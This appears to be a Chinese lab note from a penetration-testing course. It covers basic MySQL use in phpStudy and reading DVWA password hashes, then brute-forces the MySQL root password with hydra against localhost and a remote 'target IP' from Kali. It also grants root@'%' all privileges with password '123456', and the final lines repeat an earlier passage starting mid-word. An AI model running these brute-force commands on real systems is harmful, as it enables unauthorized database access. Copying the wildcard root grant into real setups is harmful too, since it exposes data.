第六天 02.mysql数据库的基本操作和密码爆破_破3306端口数据库密码

mysql数据库的基本操作

简介：

​ 数据库是什么

​ 存储数据的仓库，数据是有组织的进行存储。

mysql是一种关系数据库管理系统

使用工具：phpstudy

mysql 默认端口 3306

一、首先得进行phpstudy中mysql配置及其启动：

配置：

1. 启动phpStudy

2. 进入phpStudy配置

   找到phpStudy\MySQL\bin，将目录位置复制

   打开此电脑右键属性，高级系统设置下->环境变量

3. 把刚刚复制的路径添加到系统环境变量，path中

mysql数据库启动：

1. 重新打开cmd

2. 登录mysql命令

   ​ mysql -uroot -p

输入密码：默认密码root

二、MySQL的简单使用

1. 显示当前mysql中有哪些数据库

   #show databases;

   

2. 使用进入数据库：
   USE 数据库名;

   

3. 查询当前数据库所有表：
   SHOW TABLES;

   

   4. 查看表中所有数据

      select * from 表名

      

   5. 查询指定的多个字段：
      SELECT 字段1, 字段2, 字段3, ... FROM 表名;

      

   注意：

   可以查看到dvwa数据库中有个users，里面存放的是数据库的用户名和密码。

   可以看到password里面是密文传输。

   解决方法：

   ​ 打开网站，搜索MD5，复制密文点击查询

   

mysql数据库爆破

实验工具：windows版本的hydra(九头蛇)

实验步骤：

1. cmd进入hydra目录

可以使用cd

或者直接在hydra下直接上方输入cmd：

2. 使用命令爆破：

   爆破本机mysql

   #hydra.exe -l root -P zongpassword.txt mysql://127.0.0.1

   // -l小写l跟的是已知的账户名 -P大P 后面跟要指定zongpassword.txt为内置密码字典

   mysql://127.0.0.1

爆破完成：

kali爆破mysql密码;

​ 命令：

​ hydea -l 用户名 -P 密码字典 mysql://对方IP

补充：

​ kail远程连接windows mysql数据库

1. 首先 windwos进入musql

   mysql -uroot -p、

   

windows进入后输入

执行语句： GRANT ALL PRIVILEGES ON . TO ‘root’@‘%’ IDENTIFIED BY ‘123456’ WITH GRANT OPTION;
执行语句： FLUSH privileges; （刷新MySQL的系统权限相关表）

3. kali连接命令：

mysql -uroot -h 对方IP -p

LL PRIVILEGES ON . TO ‘root’@‘%’ IDENTIFIED BY ‘123456’ WITH GRANT OPTION;
执行语句： FLUSH privileges; （刷新MySQL的系统权限相关表）

3. kali连接命令：

mysql -uroot -h 对方IP -p